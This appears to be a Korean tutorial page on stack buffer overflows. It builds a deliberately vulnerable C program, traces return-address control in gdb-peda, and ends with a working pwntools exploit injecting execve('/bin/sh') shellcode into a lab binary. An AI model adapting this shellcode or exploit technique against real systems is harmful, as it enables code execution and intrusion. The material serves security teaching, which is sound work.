Excuse the ads! We need some help to keep our site up.
|
#include <stdio.h>
#include <unistd.h>
void vuln(){
}
void main(){
vuln();
} |
0x4004e6 : vuln 함수를 호출하는 CALL 명령어
CALL 명령어 다음 명령어의 위치 : 0x4004eb
0x4004d6 : vuln 함수의 첫번째 명령어
lazenca0x0@ubuntu:~/Exploit$ gcc -fno-stack-protector -o test test.c lazenca0x0@ubuntu:~/Exploit$ gdb -q ./test Reading symbols from ./test...(no debugging symbols found)...done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x00000000004004dd <+0>: push rbp 0x00000000004004de <+1>: mov rbp,rsp 0x00000000004004e1 <+4>: mov eax,0x0 0x00000000004004e6 <+9>: call 0x4004d6 <vuln> 0x00000000004004eb <+14>: nop 0x00000000004004ec <+15>: pop rbp 0x00000000004004ed <+16>: ret End of assembler dump. gdb-peda$ b *0x00000000004004e6 Breakpoint 1 at 0x4004e6 gdb-peda$ disassemble vuln Dump of assembler code for function vuln: 0x00000000004004d6 <+0>: push rbp 0x00000000004004d7 <+1>: mov rbp,rsp 0x00000000004004da <+4>: nop 0x00000000004004db <+5>: pop rbp 0x00000000004004dc <+6>: ret End of assembler dump. gdb-peda$ b *0x00000000004004d6 Breakpoint 2 at 0x4004d6 gdb-peda$ b *0x00000000004004dc Breakpoint 3 at 0x4004dc gdb-peda$ |
gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/test Breakpoint 1, 0x00000000004004e6 in main () gdb-peda$ i r rsp rsp 0x7fffffffe4b0 0x7fffffffe4b0 gdb-peda$ x/gx 0x7fffffffe4b0 0x7fffffffe4b0: 0x00000000004004f0 gdb-peda$ c Continuing. Breakpoint 2, 0x00000000004004d6 in vuln () gdb-peda$ i r rsp rsp 0x7fffffffe4a8 0x7fffffffe4a8 gdb-peda$ x/gx 0x7fffffffe4a8 0x7fffffffe4a8: 0x00000000004004eb gdb-peda$ |
Breakpoint 3, 0x00000000004004dc in vuln () gdb-peda$ i r rsp rsp 0x7fffffffe4a8 0x7fffffffe4a8 gdb-peda$ x/gx 0x7fffffffe4a8 0x7fffffffe4a8: 0x00000000004004eb gdb-peda$ ni 0x00000000004004eb in main () gdb-peda$ i r rip rip 0x4004eb 0x4004eb <main+14> gdb-peda$ i r rsp rsp 0x7fffffffe4b0 0x7fffffffe4b0 gdb-peda$ x/gx 0x7fffffffe4b0 0x7fffffffe4b0: 0x00000000004004f0 gdb-peda$ |
Return address 영역(0x7fffffffe488)에 저장되어 있던 값은 main+14(0x4004eb) 입니다.
Breakpoint 3, 0x00000000004004dc in vuln () gdb-peda$ i r rsp rsp 0x7fffffffe488 0x7fffffffe488 gdb-peda$ x/gx 0x7fffffffe488 0x7fffffffe488: 0x00000000004004eb gdb-peda$ set *0x7fffffffe488 = 0x4004d6 gdb-peda$ x/gx 0x7fffffffe488 0x7fffffffe488: 0x00000000004004d6 gdb-peda$ ni 0x00000000004004d6 in vuln () gdb-peda$ i r rip rip 0x4004d6 0x4004d6 <vuln> gdb-peda$ |
00400000-00401000 r-xp 00000000 08:01 925169 /home/lazenca0x0/Exploit/shellcode/test 00600000-00601000 r--p 00000000 08:01 925169 /home/lazenca0x0/Exploit/shellcode/test 00601000-00602000 rw-p 00001000 08:01 925169 /home/lazenca0x0/Exploit/shellcode/test 7ffff7a0d000-7ffff7bcd000 r-xp 00000000 08:01 1975091 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7bcd000-7ffff7dcd000 ---p 001c0000 08:01 1975091 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dcd000-7ffff7dd1000 r--p 001c0000 08:01 1975091 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd1000-7ffff7dd3000 rw-p 001c4000 08:01 1975091 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:01 1975089 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fdd000-7ffff7fe0000 rw-p 00000000 00:00 0 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:01 1975089 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:01 1975089 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] |
00400000-00401000 r-xp 00000000 08:01 925169 /home/lazenca0x0/Exploit/shellcode/test 00600000-00601000 r-xp 00000000 08:01 925169 /home/lazenca0x0/Exploit/shellcode/test 00601000-00602000 rwxp 00001000 08:01 925169 /home/lazenca0x0/Exploit/shellcode/test 7ffff7a0d000-7ffff7bcd000 r-xp 00000000 08:01 1975091 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7bcd000-7ffff7dcd000 ---p 001c0000 08:01 1975091 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dcd000-7ffff7dd1000 r-xp 001c0000 08:01 1975091 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd1000-7ffff7dd3000 rwxp 001c4000 08:01 1975091 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd3000-7ffff7dd7000 rwxp 00000000 00:00 0 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:01 1975089 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fdd000-7ffff7fe0000 rwxp 00000000 00:00 0 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r-xp 00025000 08:01 1975089 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rwxp 00026000 08:01 1975089 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rwxp 00000000 00:00 0 7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] |
#include <stdio.h>
#include <unistd.h>
void vuln(){
char buf[50];
printf("buf[50] address : %p\n",buf);
read(0, buf, 100);
}
void main(){
vuln();
} |
Stack Overflow를 확인하기 위해 다음과 같이 Break point를 설정합니다.
0x400566 : vuln 함수의 첫번째 명령어
0x400595 : read() 함수 호출
0x40059c : vuln() 함수의 ret 명령어
lazenca0x0@ubuntu:~/Exploit/shellcode$ gcc -z execstack -fno-stack-protector -o poc poc.c lazenca0x0@ubuntu:~/Exploit/shellcode$ gdb -q ./poc Reading symbols from ./poc...(no debugging symbols found)...done. gdb-peda$ disassemble vuln Dump of assembler code for function vuln: 0x0000000000400566 <+0>: push rbp 0x0000000000400567 <+1>: mov rbp,rsp 0x000000000040056a <+4>: sub rsp,0x40 0x000000000040056e <+8>: lea rax,[rbp-0x40] 0x0000000000400572 <+12>: mov rsi,rax 0x0000000000400575 <+15>: mov edi,0x400634 0x000000000040057a <+20>: mov eax,0x0 0x000000000040057f <+25>: call 0x400430 <printf@plt> 0x0000000000400584 <+30>: lea rax,[rbp-0x40] 0x0000000000400588 <+34>: mov edx,0x64 0x000000000040058d <+39>: mov rsi,rax 0x0000000000400590 <+42>: mov edi,0x0 0x0000000000400595 <+47>: call 0x400440 <read@plt> 0x000000000040059a <+52>: nop 0x000000000040059b <+53>: leave 0x000000000040059c <+54>: ret End of assembler dump. gdb-peda$ b *0x400566 Breakpoint 1 at 0x400566 gdb-peda$ b *0x400595 Breakpoint 2 at 0x400595 gdb-peda$ b *0x40059c Breakpoint 3 at 0x40059c gdb-peda$ |
rsp 레지스터가 가리키고 있는 최상위 Stack 메모리는 0x7fffffffe448 입니다.
gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/shellcode/poc Breakpoint 1, 0x0000000000400566 in vuln () gdb-peda$ i r rsp rsp 0x7fffffffe448 0x7fffffffe448 gdb-peda$ x/gx 0x7fffffffe448 0x7fffffffe448: 0x00000000004005ab gdb-peda$ disassemble main Dump of assembler code for function main: 0x000000000040059d <+0>: push rbp 0x000000000040059e <+1>: mov rbp,rsp 0x00000000004005a1 <+4>: mov eax,0x0 0x00000000004005a6 <+9>: call 0x400566 <vuln> 0x00000000004005ab <+14>: nop 0x00000000004005ac <+15>: pop rbp 0x00000000004005ad <+16>: ret End of assembler dump. gdb-peda$ |
gdb-peda$ c Continuing. buf[50] address : 0x7fffffffe400 Breakpoint 2, 0x0000000000400595 in vuln () gdb-peda$ i r rsi rsi 0x7fffffffe400 0x7fffffffe400 gdb-peda$ p/d 0x7fffffffe448 - 0x7fffffffe400 $1 = 72 gdb-peda$ ni AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJKKKKKKKK gdb-peda$ x/10gx 0x7fffffffe400 0x7fffffffe400: 0x4141414141414141 0x4242424242424242 0x7fffffffe410: 0x4343434343434343 0x4444444444444444 0x7fffffffe420: 0x4545454545454545 0x4646464646464646 0x7fffffffe430: 0x4747474747474747 0x4848484848484848 0x7fffffffe440: 0x4949494949494949 0x4a4a4a4a4a4a4a4a gdb-peda$ |
Breakpoint 3, 0x000000000040059c in vuln () gdb-peda$ x/gx 0x7fffffffe448 0x7fffffffe448: 0x4a4a4a4a4a4a4a4a gdb-peda$ x/s 0x7fffffffe448 0x7fffffffe448: "JJJJJJJJKKKKKKKK\nآ\367\377\177" gdb-peda$ |
from pwn import *
p = process('./poc')
p.recvuntil('buf[50] address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
exploit = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
exploit += "\x90" * (72 - len(exploit))
exploit += p64(stackAddr)
p.send(exploit)
p.interactive() |
lazenca0x0@ubuntu:~/Exploit/shellcode$ python exploit.py [+] Starting local process './test': pid 111702 [*] Switching to interactive mode $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |